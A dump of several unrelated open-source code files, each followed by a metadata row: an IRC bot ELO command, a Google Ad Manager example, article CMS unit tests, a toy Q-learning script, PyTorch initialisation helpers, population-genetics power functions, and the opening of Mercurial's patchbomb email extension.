@botologist.plugin.command("elo", threaded=True)
def get_elo(self, msg):
"""Get a player's ELO from qlranks."""
if len(msg.args) < 1:
return
if len(msg.args) > 1:
if "," in msg.args[1]:
modes = msg.args[1].split(",")
else:
modes = msg.args[1:]
return _get_qlr_elo(msg.args[0], modes)
else:
return _get_qlr_elo(msg.args[0])
| mit | 1,812,270,986,986,135,800 | 28.388889 | 86 | 0.58034 | false |
Aloomaio/googleads-python-lib | examples/ad_manager/v201808/reconciliation_report_row_service/get_reconciliation_report_rows_for_reconciliation_report.py | 1 | 2609 | #!/usr/bin/env python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Gets a reconciliation report's rows for line items that Ad Manager served.
"""
# Import appropriate modules from the client library.
from googleads import ad_manager
# Set the ID of the reconciliation report row.
RECONCILIATION_REPORT_ID = 'INSERT_RECONCILIATION_REPORT_ID_HERE'
def main(client, reconciliation_report_id):
# Initialize appropriate service.
reconciliation_report_row_service = client.GetService(
'ReconciliationReportRowService', version='v201808')
# Create a statement to select reconciliation report rows.
statement = (ad_manager.StatementBuilder(version='v201808')
.Where(('reconciliationReportId = :reportId '
'AND lineItemId != :lineItemId'))
.WithBindVariable('lineItemId', 0)
.WithBindVariable('reportId', long(reconciliation_report_id)))
# Retrieve a small amount of reconciliation report rows at a time, paging
# through until all reconciliation report rows have been retrieved.
while True:
response = (
reconciliation_report_row_service
.getReconciliationReportRowsByStatement(
statement.ToStatement()))
if 'results' in response and len(response['results']):
for reconciliation_report_row in response['results']:
# Print out some information for each reconciliation report row.
print('Reconciliation report row with ID "%d", reconciliation source '
'"%s", and reconciled volume "%d" was found.\n' %
(reconciliation_report_row['id'],
reconciliation_report_row['reconciliationSource'],
reconciliation_report_row['reconciledVolume']))
statement.offset += statement.limit
else:
break
print '\nNumber of results found: %s' % response['totalResultSetSize']
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client, RECONCILIATION_REPORT_ID)
| apache-2.0 | 5,258,400,101,180,364,000 | 39.765625 | 78 | 0.706401 | false |
ZeitOnline/zeit.content.article | src/zeit/content/article/tests/test_article.py | 1 | 17840 | # coding: utf8
from zeit.cms.workflow.interfaces import CAN_PUBLISH_ERROR
from zeit.cms.workflow.interfaces import CAN_PUBLISH_SUCCESS
import lxml.etree
import mock
import zeit.cms.checkout.helper
import zeit.cms.content.interfaces
import zeit.cms.content.reference
import zeit.cms.interfaces
import zeit.cms.workflow.interfaces
import zeit.cms.section.interfaces
import zeit.content.article.edit.interfaces
import zeit.content.article.testing
import zeit.content.image.imagegroup
import zeit.magazin.interfaces
import zeit.edit.interfaces
import zeit.edit.rule
import zope.component
import zope.event
import zope.interface
import zope.lifecycleevent
class WorkflowTest(zeit.content.article.testing.FunctionalTestCase):
def setUp(self):
super(WorkflowTest, self).setUp()
self.article = zeit.cms.interfaces.ICMSContent(
'http://xml.zeit.de/online/2007/01/Somalia')
self.info = zeit.cms.workflow.interfaces.IPublishInfo(self.article)
sm = zope.component.getSiteManager()
self.orig_validator = sm.adapters.lookup(
(zeit.content.article.interfaces.IArticle,),
zeit.edit.interfaces.IValidator)
self.validator = mock.Mock()
zope.component.provideAdapter(
self.validator,
adapts=(zeit.content.article.interfaces.IArticle,),
provides=zeit.edit.interfaces.IValidator)
def tearDown(self):
zope.component.getSiteManager().unregisterAdapter(
required=(zeit.content.article.interfaces.IArticle,),
provided=zeit.edit.interfaces.IValidator)
zope.component.provideAdapter(
self.orig_validator,
adapts=(zeit.content.article.interfaces.IArticle,),
provides=zeit.edit.interfaces.IValidator)
super(WorkflowTest, self).tearDown()
def test_not_urgent_cannot_publish(self):
self.assertFalse(self.info.urgent)
self.assertEqual(CAN_PUBLISH_ERROR, self.info.can_publish())
self.assertFalse(self.validator.called)
def test_validation_passes_can_publish(self):
self.info.urgent = True
self.validator().status = None
self.assertEqual(CAN_PUBLISH_SUCCESS, self.info.can_publish())
self.validator.assert_called_with(self.article)
def test_validation_fails_cannot_publish(self):
self.info.urgent = True
self.validator().status = zeit.edit.rule.ERROR
self.validator().messages = []
self.assertEqual(CAN_PUBLISH_ERROR, self.info.can_publish())
self.validator.assert_called_with(self.article)
class DivisionTest(zeit.content.article.testing.FunctionalTestCase):
# See bug #9495
def get_article_with_paras(self):
article = self.get_article()
factory = self.get_factory(article, 'p')
for _ in range(10):
factory()
return article
def test_article_should_not_mangle_divisions_on_create(self):
article = self.get_article_with_paras()
self.assertEqual(1, len(article.xml.body.findall('division')))
def test_article_should_not_mangle_divisions_on_add_to_repository(self):
article = self.get_article_with_paras()
self.repository['article'] = article
self.assertEqual(
1, len(self.repository['article'].xml.body.findall('division')))
def test_article_should_not_mangle_divisions_on_checkin(self):
from zeit.cms.checkout.helper import checked_out
article = self.get_article_with_paras()
self.repository['article'] = article
with checked_out(self.repository['article']):
pass
self.assertEqual(
1, len(self.repository['article'].xml.body.findall('division')))
def test_article_without_division_should_get_them_on_checkin(self):
from zeit.cms.checkout.helper import checked_out
article = self.get_article_with_paras()
# mangle the xml
for p in article.xml.body.division.getchildren():
article.xml.body.append(p)
article.xml.body.remove(article.xml.body.division)
self.repository['article'] = article
with checked_out(self.repository['article']):
pass
self.assertEqual(
2, len(self.repository['article'].xml.body.findall('division')))
class MainImageTest(zeit.content.article.testing.FunctionalTestCase):
def test_main_image_is_none_if_first_body_is_empty(self):
article = self.get_article()
self.assertEqual(None, article.main_image)
def test_main_image_is_none_if_first_block_is_not_an_image(self):
article = self.get_article()
self.get_factory(article, 'p')()
self.assertEqual(None, article.main_image)
def test_main_image_is_none_if_first_block_is_an_empty_image(self):
article = self.get_article()
self.get_factory(article, 'image')()
self.assertEqual(None, article.main_image)
def test_main_image_is_returned_if_first_block_contains_one(self):
article = self.get_article()
block = self.get_factory(article, 'image')()
image = zeit.cms.interfaces.ICMSContent(
'http://xml.zeit.de/2006/DSC00109_2.JPG')
block.references = block.references.create(image)
self.assertEqual(image, article.main_image.target)
def test_setting_main_image_is_reflected_inside_body(self):
article = self.get_article()
block = self.get_factory(article, 'image')()
image = zeit.cms.interfaces.ICMSContent(
'http://xml.zeit.de/2006/DSC00109_2.JPG')
article.main_image = article.main_image.create(image)
block = article.body.values()[0]
self.assertEqual(image, block.references.target)
self.assertFalse(block.is_empty)
def test_setting_main_image_works_if_body_does_not_start_with_image(self):
article = self.get_article()
image = zeit.cms.interfaces.ICMSContent(
'http://xml.zeit.de/2006/DSC00109_2.JPG')
article.main_image = article.main_image.create(image)
block = article.body.values()[0]
self.assertEqual(image, block.references.target)
class NormalizeQuotes(zeit.content.article.testing.FunctionalTestCase):
def test_normalize_body(self):
article = self.get_article()
p = self.get_factory(article, 'p')()
p.text = '“up” and „down‟ and «around»'
self.repository['article'] = article
with zeit.cms.checkout.helper.checked_out(
self.repository['article']) as co:
block = co.body.values()[0]
self.assertEqual('"up" and "down" and "around"', block.text)
def test_normalize_teaser(self):
article = self.get_article()
article.teaserTitle = u'“up” and „down‟ and «around»'
self.repository['article'] = article
with zeit.cms.checkout.helper.checked_out(
self.repository['article']) as co:
self.assertEqual('"up" and "down" and "around"', co.teaserTitle)
class LayoutHeaderByArticleTemplate(
zeit.content.article.testing.FunctionalTestCase):
def test_header_layout_should_determine_header_module_visibility(self):
article = self.get_article()
article.template = u'column'
article.header_layout = u'default'
source = zeit.content.article.source.ArticleTemplateSource().factory
self.assertTrue(source.allow_header_module(article))
class DefaultTemplateByContentType(
zeit.content.article.testing.FunctionalTestCase):
def test_config_should_define_default_template_for_context(self):
article = self.get_article()
source = zeit.content.article.source.ArticleTemplateSource().factory
has_default = source._provides_default(
article,
['zeit.cms.section.interfaces.IZONContent'])
self.assertFalse(has_default)
zope.interface.alsoProvides(article,
zeit.cms.section.interfaces.IZONContent)
has_default = source._provides_default(
article,
['zeit.cms.section.interfaces.IZONContent'])
self.assertTrue(has_default)
article = self.get_article()
zope.interface.alsoProvides(article,
zeit.magazin.interfaces.IZMOContent)
has_default = source._provides_default(
article,
['zeit.cms.section.interfaces.IZONContent',
'zeit.magazin.interfaces.IZMOContent'])
self.assertTrue(has_default)
def test_config_should_define_generic_default_for_context(self):
source = zeit.content.article.source.ArticleTemplateSource().factory
self.assertEquals(
('article', 'inside'),
source._get_generic_default())
def test_config_should_provide_defaults(self):
article = self.get_article()
source = zeit.content.article.source.ArticleTemplateSource().factory
zope.interface.alsoProvides(article,
zeit.cms.section.interfaces.IZONContent)
self.assertEquals(
('article', 'default'),
source.get_default_template(article))
article = self.get_article()
source = zeit.content.article.source.ArticleTemplateSource().factory
zope.interface.alsoProvides(article,
zeit.magazin.interfaces.IZMOContent)
self.assertEquals(
('short', ''),
source.get_default_template(article))
article = self.get_article()
self.assertEquals(
('article', 'inside'),
source.get_default_template(article))
def test_article_should_have_default_template_on_checkout(self):
article = self.get_article()
self.repository['article'] = article
with zeit.cms.checkout.helper.checked_out(self.repository['article']):
pass
self.assertEquals('article', self.repository['article'].template)
self.assertEquals('default', self.repository['article'].header_layout)
def test_checkout_should_not_change_template_if_already_set(self):
article = self.get_article()
article.template = u'column'
article.header_layout = u'heiter'
self.repository['article'] = article
with zeit.cms.checkout.helper.checked_out(self.repository['article']):
pass
self.assertEquals('column', self.repository['article'].template)
self.assertEquals('heiter', self.repository['article'].header_layout)
def test_checkout_should_assign_default_if_current_value_invalid(self):
article = self.get_article()
article.template = u'nonexistent'
self.repository['article'] = article
with zeit.cms.checkout.helper.checked_out(self.repository['article']):
pass
self.assertEquals('article', self.repository['article'].template)
def test_article_should_have_default_variant_name_on_checkout(self):
article = self.get_article()
article._create_image_block_in_front()
self.repository['article'] = article
with zeit.cms.checkout.helper.checked_out(self.repository['article']):
pass
self.assertEquals(
'original', self.repository['article'].main_image_variant_name)
def test_checkout_should_not_change_variant_name_if_already_set(self):
article = self.get_article()
article._create_image_block_in_front()
article.main_image_variant_name = 'wide'
self.repository['article'] = article
with zeit.cms.checkout.helper.checked_out(self.repository['article']):
pass
self.assertEquals(
'wide', self.repository['article'].main_image_variant_name)
def test_changing_template_should_set_default_header(self):
article = self.get_article()
article._create_image_block_in_front()
article.template = u'column'
self.repository['article'] = article
with zeit.cms.checkout.helper.checked_out(
self.repository['article']) as article:
self.assertEqual(None, article.header_layout)
article.template = u'article'
zope.event.notify(zope.lifecycleevent.ObjectModifiedEvent(
article, zope.lifecycleevent.Attributes(
zeit.content.article.interfaces.IArticle, 'template')))
self.assertEqual('default', article.header_layout)
class AccessRestrictsAMPandFBIA(
zeit.content.article.testing.FunctionalTestCase):
def setUp(self):
super(AccessRestrictsAMPandFBIA, self).setUp()
self.repository['article'] = self.get_article()
self.article = self.repository['article']
def notify_modified(self, article, field='access'):
zope.event.notify(zope.lifecycleevent.ObjectModifiedEvent(
article, zope.lifecycleevent.Attributes(
zeit.cms.content.interfaces.ICommonMetadata, field)))
def test_setting_access_to_abo_or_registration_disables_amp_and_fbia(self):
with zeit.cms.checkout.helper.checked_out(self.article) as article:
article.is_amp = True
article.is_instant_article = True
article.access = u'abo'
self.notify_modified(article)
self.assertEqual(False, article.is_amp)
self.assertEqual(False, article.is_instant_article)
article.is_amp = True
article.is_instant_article = True
article.access = u'registration'
self.notify_modified(article)
self.assertEqual(False, article.is_amp)
self.assertEqual(False, article.is_instant_article)
def test_setting_access_to_free_does_not_change_is_amp_and_fbia(self):
with zeit.cms.checkout.helper.checked_out(self.article) as article:
article.is_amp = True
article.is_instant_article = True
article.access = u'free'
self.notify_modified(article)
self.assertEqual(True, article.is_amp)
self.assertEqual(True, article.is_instant_article)
def test_do_not_change_is_amp_if_access_is_missing(self):
"""For bw-compat old articles without access are treated as free."""
with zeit.cms.checkout.helper.checked_out(self.article) as article:
article.is_amp = True
article.is_instant_article = True
article.access = None
self.notify_modified(article)
self.assertEqual(True, article.is_amp)
self.assertEqual(True, article.is_instant_article)
def test_only_change_is_amp_if_access_was_changed(self):
with zeit.cms.checkout.helper.checked_out(self.article) as article:
article.access = u'abo'
article.is_amp = True
article.is_instant_article = True
article.year = 2016
self.notify_modified(article, 'year')
self.assertEqual(True, article.is_amp)
self.assertEqual(True, article.is_instant_article)
class ArticleXMLReferenceUpdate(
zeit.content.article.testing.FunctionalTestCase):
def test_writes_genre_as_attribute(self):
self.repository['article'] = self.get_article()
with zeit.cms.checkout.helper.checked_out(
self.repository['article']) as co:
co.genre = u'nachricht'
reference = zope.component.queryAdapter(
self.repository['article'],
zeit.cms.content.interfaces.IXMLReference, name='related')
self.assertIn(
'genre="nachricht"',
lxml.etree.tostring(reference, pretty_print=True))
class ArticleElementReferencesTest(
zeit.content.article.testing.FunctionalTestCase):
def setUp(self):
super(ArticleElementReferencesTest, self).setUp()
self.article = self.get_article()
def create_empty_portraitbox_reference(self):
from zeit.content.article.edit.body import EditableBody
body = EditableBody(self.article, self.article.xml.body)
portraitbox_reference = body.create_item('portraitbox', 1)
portraitbox_reference._validate = mock.Mock()
return portraitbox_reference
def test_articles_element_references_iterates_over_references(self):
from zeit.content.portraitbox.portraitbox import Portraitbox
pbox = Portraitbox()
self.repository['pbox'] = pbox
ref = self.create_empty_portraitbox_reference()
ref.references = pbox
self.assertEqual([pbox], list(zeit.edit.interfaces.IElementReferences(
self.article)))
def test_empty_imagegroup_not_in_element_references(self):
from zeit.content.article.edit.body import EditableBody
self.repository['image-group'] = \
zeit.content.image.imagegroup.ImageGroup()
body = EditableBody(self.article, self.article.xml.body)
image_group = body.create_item('image', 3)
image_group.references = image_group.references.create(
self.repository['image-group'])
image_group._validate = mock.Mock()
self.repository['article_with_empty_ref'] = self.article
self.assertEqual([], list(zeit.edit.interfaces.IElementReferences(
self.repository['article_with_empty_ref'])))
def test_articles_element_references_is_empty_if_no_references_are_set(
self):
self.assertEqual([], list(zeit.edit.interfaces.IElementReferences(
self.article)))
def test_articles_element_references_is_empty_if_empty_reference_is_set(
self):
self.create_empty_portraitbox_reference()
self.assertEqual([], list(zeit.edit.interfaces.IElementReferences(
self.article)))
| bsd-3-clause | 5,625,414,481,670,800,000 | 40.635514 | 79 | 0.654714 | false |
minimalparts/Tutorials | RLcafe/caffe.py | 1 | 3150 | import numpy as np
import random
environment = {
0: [('buongiorno',[[1,0,1]]),('un caffè',[[7,0,1]])],
1: [('un caffè',[[2,0,0.8],[12,-2,0.2]])],
2: [('per favore',[[3,0,1]]),('EOS',[[5,-2,0.9],[6,-1,0.1]])],
3: [('EOS',[[4,-1,1]])],
7: [('per favore',[[8,0,1]]),('EOS',[[9,-3,1]])],
8: [('EOS',[[10,-2,0.9],[11,-1,0.1]])]
}
#index to actions
i_to_actions = {0: 'buongiorno', 1: 'un caffè', 2: 'per favore', 3: 'EOS'}
actions_to_i = {'buongiorno':0, 'un caffè':1, 'per favore':2, 'EOS':3}
#Initialising the Q matrix
q_matrix = []
for i in range(13):
q_matrix.append([0,0,0,0])
exit_states = [4,5,6,9,10,11,12]
def get_possible_next_actions(cur_pos):
return environment[cur_pos]
def get_next_state(action):
word = action[0]
possible_states = action[1]
fate = {}
for p in possible_states:
s = p[0]
r = p[1]
l = p[2]
fate[s] = [r,l]
next_state = np.random.choice(list(fate.keys()),1,[v[1] for k,v in fate.items()])
reward = fate[next_state[0]][0]
#print(next_state[0],reward)
return next_state[0],reward
def game_over(cur_pos):
return cur_pos in exit_states
discount = 0.9
learning_rate = 0.1
for _ in range(500):
print("\nEpisode ", _ )
# get starting place
cur_pos = 0
# while goal state is not reached
episode_return = 0
while(not game_over(cur_pos)):
# get all possible next states from cur_step
possible_actions = get_possible_next_actions(cur_pos)
# select any one action randomly
action = random.choice(possible_actions)
word = action[0]
action_i = actions_to_i[word]
print(word)
# find the next state corresponding to the action selected
next_state,reward = get_next_state(action)
episode_return+=reward
# update the q_matrix
q_matrix[cur_pos][action_i] = q_matrix[cur_pos][action_i] + learning_rate * (reward + discount * max(q_matrix[next_state]) - q_matrix[cur_pos][action_i])
print(cur_pos,q_matrix[cur_pos],next_state)
# go to next state
cur_pos = next_state
print("Reward:",episode_return,"\n")
print(np.array(q_matrix).reshape(13,4))
print("Training done...")
print("\n***\nTesting...\n***\n")
# get starting place
cur_pos = 0
episode_return = 0
while(not game_over(cur_pos)):
# get all possible next states from cur_step
possible_actions = get_possible_next_actions(cur_pos)
#print(possible_actions)
# select the *possible* action with highest Q value
action = None
if np.linalg.norm(q_matrix[cur_pos]) == 0:
action = random.choice(possible_actions)
else:
action = actions_to_i[possible_actions[0][0]]
c = 0
action_i = c
for a in possible_actions:
a_i = actions_to_i[a[0]]
if q_matrix[cur_pos][a_i] > q_matrix[cur_pos][action]:
action = a_i
action_i = c
c+=1
action = possible_actions[action_i]
print(action[0])
next_state,reward = get_next_state(action)
episode_return+=reward
cur_pos = next_state
print("Return:",episode_return)
| mit | -4,122,450,842,618,977,300 | 30.148515 | 161 | 0.586459 | false |
2prime/DeepLab | NMResNet/init.py | 1 | 2336 | '''
MSRA INIT
net parameter initialization.
He K, Zhang X, Ren S, et al.
Delving Deep into Rectifiers: Surpassing Human-Level Performance on ImageNet Classification,
arxiv:1502.01852
Reference:http://damon.studio/2017/06/11/WeightsInitialization/
'''
import torch.nn as nn
import torch.nn.init as init
'''
usage:
class Net(nn.Module):
def __init__(*parameters):
super(Net, self).__init__()
...parameter setting
msra_init(self)
def forward(*para):
...
'''
def msra_init(net):
'''Init layer parameters.'''
for m in net.modules():
if isinstance(m, nn.Conv2d):
init.kaiming_normal(m.weight)
# Modified by lzh @ 201707251408:
# <<< Old:
# if m.bias:
# >>> New:
if m.bias is not None:
init.constant(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
init.constant(m.weight, 1)
init.constant(m.bias, 0)
elif isinstance(m, nn.Linear):
init.normal(m.weight, std=1e-3)
# Modified by lzh @ 201707241734:
# <<< Old:
# if m.bias:
# >>> New:
if m.bias is not None:
# --- End
init.constant(m.bias, 0)
# Added by lzh @ 201707251404:
def xavier_init(net):
'''Init layer parameters.'''
for m in net.modules():
if isinstance(m, nn.Conv2d):
init.xavier_normal(m.weight)
if m.bias is not None:
init.constant(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
init.constant(m.weight, 1)
init.constant(m.bias, 0)
elif isinstance(m, nn.Linear):
init.normal(m.weight, std=1e-3)
if m.bias is not None:
init.constant(m.bias, 0)
def gauss_init(net):
'''Init layer parameters.'''
for m in net.modules():
if isinstance(m, nn.Conv2d):
init.normal(0.0, 0.01)
if m.bias is not None:
init.constant(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
init.constant(m.weight, 1)
init.constant(m.bias, 0)
elif isinstance(m, nn.Linear):
init.normal(m.weight, std=1e-3)
if m.bias is not None:
init.constant(m.bias, 0)
# --- End | mit | -4,048,549,762,413,042,700 | 28.961538 | 92 | 0.536387 | false |
broadinstitute/cms | cms/power/power_func.py | 1 | 8625 | ## functions for analyzing empirical/simulated CMS output
## last updated 09.14.2017 [email protected]
import matplotlib as mp
mp.use('agg')
import matplotlib.pyplot as plt
import numpy as np
import math
from scipy.stats import percentileofscore
###################
## DEFINE SCORES ##
###################
def write_master_likesfile(writefilename, model, selpop, freq,basedir, miss = "neut",):
'''adapted from run_likes_func.py'''
writefile = open(writefilename, 'w')
for score in ['ihs', 'nsl', 'delihh']:
hitlikesfilename = basedir + model + "/" + score + "/likes_sel" + str(selpop) + "_" + str(freq) + "_causal.txt"#_smoothed.txt"
misslikesfilename = basedir + model + "/" + score + "/likes_sel" + str(selpop) + "_" + str(freq) + "_" + miss + ".txt"#"_smoothed.txt"
#assert(os.path.isfile(hitlikesfilename) and os.path.isfile(misslikesfilename))
writefile.write(hitlikesfilename + "\n" + misslikesfilename + "\n")
for score in ['xpehh', 'fst', 'deldaf']:
hitlikesfilename = basedir + model + "/" + score + "/likes_sel" + str(selpop) + "_choose_" + str(freq) + "_causal.txt"#_smoothed.txt"
misslikesfilename = basedir + model + "/" + score + "/likes_sel" + str(selpop) + "_choose_" + str(freq) + "_" + miss + ".txt"#"_smoothed.txt"
#assert(os.path.isfile(hitlikesfilename) and os.path.isfile(misslikesfilename))
writefile.write(hitlikesfilename + "\n" + misslikesfilename + "\n")
writefile.close()
print("wrote to: " + writefilename)
return
###############
## REGION ID ##
###############
def get_window(istart, physpos, scores, windowlen = 100000):
window_scores = [scores[istart]]
startpos = physpos[istart]
pos = startpos
iscore = istart
while pos < (startpos + windowlen):
iscore += 1
if iscore >= len(scores):
break
window_scores.append(scores[iscore])
pos = physpos[iscore]
#print(str(pos) + " " + str(startpos))
return window_scores
def check_outliers(scorelist, cutoff = 3):
numscores = len(scorelist)
outliers = [item for item in scorelist if item > cutoff]
numoutliers = len(outliers)
percentage = (float(numoutliers) / float(numscores)) * 100.
return percentage
def check_rep_windows(physpos, scores, windowlen = 100000, cutoff = 3, totalchrlen=1000000):
'''
previous implementation: !!!! this is going to result in false positives whenever I have a small uptick right near the edge of the replicate
'''
#check window defined by each snp as starting point
rep_percentages = []
numSnps = len(physpos)
numWindows = 0
#get exhaustive windows and stop at chrom edge
for isnp in range(numSnps):
if physpos[isnp] + windowlen < totalchrlen:
numWindows +=1
else:
#print(str(physpos[isnp]) + "\t")
break
for iPos in range(numWindows):
window_scores = get_window(iPos, physpos, scores, windowlen)
percentage = check_outliers(window_scores, cutoff)
rep_percentages.append(percentage)
return rep_percentages
def merge_windows(chrom_signif, windowlen, maxGap = 100000):
print('should implement this using bedtools')
starts, ends = [], []
contig = False
this_windowlen = 0
starting_pos = 0
if len(chrom_signif) > 0:
for i_start in range(len(chrom_signif) - 1):
if not contig:
starts.append(chrom_signif[i_start])
this_windowlen = windowlen #unmerged, default
starting_pos = chrom_signif[i_start]
if ((chrom_signif[i_start] + this_windowlen) > chrom_signif[i_start + 1]): #contiguous
contig = True
this_windowlen = chrom_signif[i_start +1] + windowlen - starting_pos
#or, could also be contiguous in the situation where the next snp is not within this window because there doesn't exist such a snp
elif chrom_signif[i_start +1] >=(chrom_signif[i_start] + this_windowlen) and chrom_signif[i_start +1] < (chrom_signif[i_start] + maxGap):
contig = True
this_windowlen = chrom_signif[i_start +1] + windowlen - starting_pos
else:
contig = False
if not contig:
windowend = chrom_signif[i_start] + windowlen
ends.append(windowend)
if contig: #last region is overlapped by its predecssor
ends.append(chrom_signif[-1] + windowlen)
else:
starts.append(chrom_signif[-1])
ends.append(chrom_signif[-1] + windowlen)
assert len(starts) == len(ends)
return starts, ends
##########################
## POWER & SIGNIFICANCE ##
##########################
def calc_pr(all_percentages, threshhold):
numNeutReps_exceedThresh = 0
totalnumNeutReps = len(all_percentages)
for irep in range(totalnumNeutReps):
if len(all_percentages[irep]) != 0:
if max(all_percentages[irep]) > threshhold:
numNeutReps_exceedThresh +=1
numNeutReps_exceedThresh, totalnumNeutReps = float(numNeutReps_exceedThresh), float(totalnumNeutReps)
if totalnumNeutReps != 0:
pr = numNeutReps_exceedThresh / totalnumNeutReps
else:
pr = 0
print('ERROR; empty set')
return pr
def get_causal_rank(values, causal_val):
if np.isnan(causal_val):
return(float('nan'))
assert(causal_val in values)
cleanvals = []
for item in values:
if not np.isnan(item) and not np.isinf(item):
cleanvals.append(item)
values = cleanvals
values.sort()
values.reverse()
causal_rank = values.index(causal_val)
return causal_rank
def get_cdf_from_causal_ranks(causal_ranks):
numbins = max(causal_ranks) #? heuristic
counts, bins = np.histogram(causal_ranks, bins=numbins, normed = True) #doublecheck
cdf = np.cumsum(counts)
return bins, cdf
def get_pval(all_simscores, thisScore):
r = np.searchsorted(all_simscores,thisScore)
n = len(all_simscores)
pval = 1. - ((r + 1.) / (n + 1.))
if pval > 0:
#pval *= nSnps #Bonferroni
return pval
else:
#print("r: " +str(r) + " , n: " + str(n))
pval = 1. - (r/(n+1))
#pval *= nSnps #Bonferroni
return pval
###############
## VISUALIZE ##
###############
def quick_plot(ax, pos, val, ylabel,causal_index=-1):
ax.scatter(pos, val, s=.8)
if causal_index != -1:
ax.scatter(pos[causal_index], val[causal_index], color='r', s=4)
for tick in ax.yaxis.get_major_ticks():
tick.label.set_fontsize('6')
ax.set_ylabel(ylabel, fontsize='6')
#ax.set_xlim([0, 1500000]) #make flexible?
ax.yaxis.set_label_position('right')
#ax.set_ylim([min(val), max(val)])
return ax
def plot_dist(allvals, savefilename= "/web/personal/vitti/test.png", numBins=1000):
#print(allvals)
#get rid of nans and infs
#cleanvals = [item for item in allvals if not np.isnan(item)]
#allvals = cleanvals
allvals = np.array(allvals)
allvals = allvals[~np.isnan(allvals)]
allvals = allvals[~np.isinf(allvals)]
#allvals = list(allvals)
#print(allvals)
print("percentile for score = 10: " + str(percentileofscore(allvals, 10)))
print("percentile for score = 15: " + str(percentileofscore(allvals, 15)))
if len(allvals) > 0:
f, ax = plt.subplots(1)
ax.hist(allvals, bins=numBins)
plt.savefig(savefilename)
print('plotted to ' + savefilename)
return
def plotManhattan(ax, neut_rep_scores, emp_scores, chrom_pos, nSnps, maxSkipVal = 0, zscores = True):
#neut_rep_scores.sort()
#print('sorted neutral scores...')
lastpos = 0
for chrom in range(1,23):
ichrom = chrom-1
if ichrom%2 == 0:
plotcolor = "darkblue"
else:
plotcolor = "lightblue"
if zscores == True:
#http://stackoverflow.com/questions/3496656/convert-z-score-z-value-standard-score-to-p-value-for-normal-distribution-in?rq=1
#Z SCORE cf SG email 103116
#pvals = [get_pval(neut_rep_scores, item) for item in emp_scores[ichrom]]
pvalues = []
for item in emp_scores[ichrom]:
if item < maxSkipVal: #speed up this process by ignoring anything obviously insignificant
pval = 1
else:
#print('scipy')
#sys.exit()
pval = scipy.stats.norm.sf(abs(item))
pvalues.append(pval)
#else:
# pval = get_pval(neut_rep_scores, item)
#pvalues.append(pval)
print("calculated pvalues for chrom " + str(chrom))
chrom_pos = range(lastpos, lastpos + len(pvalues))
logtenpvals = [(-1. * math.log10(pval)) for pval in pvalues]
ax.scatter(chrom_pos, logtenpvals, color =plotcolor, s=.5)
lastpos = chrom_pos[-1]
else:
chrom_pos = range(lastpos, lastpos + len(emp_scores[ichrom]))
ax.scatter(chrom_pos, emp_scores[ichrom], color=plotcolor, s=.5)
lastpos = chrom_pos[-1]
return ax
def plotManhattan_extended(ax, emp_scores, chrom_pos, chrom):
''' makes a figure more like in Karlsson 2013 instead of Grossman 2013'''
ax.plot(chrom_pos, emp_scores, linestyle='None', marker=".", markersize=.3, color="black")
ax.set_ylabel('chr' + str(chrom), fontsize=6, rotation='horizontal')
labels = ax.get_yticklabels()
ax.set_yticklabels(labels, fontsize=6)
ax.set_axis_bgcolor('LightGray')
return ax
| bsd-2-clause | 7,845,082,051,252,510,000 | 34.9375 | 143 | 0.679072 | false |
vmg/hg-stable | hgext/patchbomb.py | 1 | 21405 | # patchbomb.py - sending Mercurial changesets as patch emails
#
# Copyright 2005-2009 Matt Mackall <[email protected]> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
'''command to send changesets as (a series of) patch emails
The series is started off with a "[PATCH 0 of N]" introduction, which
describes the series as a whole.
Each patch email has a Subject line of "[PATCH M of N] ...", using the
first line of the changeset description as the subject text. The
message contains two or three body parts:
- The changeset description.
- [Optional] The result of running diffstat on the patch.
- The patch itself, as generated by :hg:`export`.
Each message refers to the first in the series using the In-Reply-To
and References headers, so they will show up as a sequence in threaded
mail and news readers, and in mail archives.
To configure other defaults, add a section like this to your
configuration file::
[email]
from = My Name <my@email>
to = recipient1, recipient2, ...
cc = cc1, cc2, ...
bcc = bcc1, bcc2, ...
reply-to = address1, address2, ...
Use ``[patchbomb]`` as configuration section name if you need to
override global ``[email]`` address settings.
Then you can use the :hg:`email` command to mail a series of
changesets as a patchbomb.
You can also either configure the method option in the email section
to be a sendmail compatible mailer or fill out the [smtp] section so
that the patchbomb extension can automatically send patchbombs
directly from the commandline. See the [email] and [smtp] sections in
hgrc(5) for details.
'''
import os, errno, socket, tempfile, cStringIO
import email.MIMEMultipart, email.MIMEBase
import email.Utils, email.Encoders, email.Generator
from mercurial import cmdutil, commands, hg, mail, patch, util
from mercurial import scmutil
from mercurial.i18n import _
from mercurial.node import bin
cmdtable = {}
command = cmdutil.command(cmdtable)
testedwith = 'internal'
def prompt(ui, prompt, default=None, rest=':'):
if default:
prompt += ' [%s]' % default
return ui.prompt(prompt + rest, default)
def introwanted(opts, number):
'''is an introductory message apparently wanted?'''
return number > 1 or opts.get('intro') or opts.get('desc')
def makepatch(ui, repo, patchlines, opts, _charsets, idx, total, numbered,
patchname=None):
desc = []
node = None
body = ''
for line in patchlines:
if line.startswith('#'):
if line.startswith('# Node ID'):
node = line.split()[-1]
continue
if line.startswith('diff -r') or line.startswith('diff --git'):
break
desc.append(line)
if not patchname and not node:
raise ValueError
if opts.get('attach') and not opts.get('body'):
body = ('\n'.join(desc[1:]).strip() or
'Patch subject is complete summary.')
body += '\n\n\n'
if opts.get('plain'):
while patchlines and patchlines[0].startswith('# '):
patchlines.pop(0)
if patchlines:
patchlines.pop(0)
while patchlines and not patchlines[0].strip():
patchlines.pop(0)
ds = patch.diffstat(patchlines, git=opts.get('git'))
if opts.get('diffstat'):
body += ds + '\n\n'
addattachment = opts.get('attach') or opts.get('inline')
if not addattachment or opts.get('body'):
body += '\n'.join(patchlines)
if addattachment:
msg = email.MIMEMultipart.MIMEMultipart()
if body:
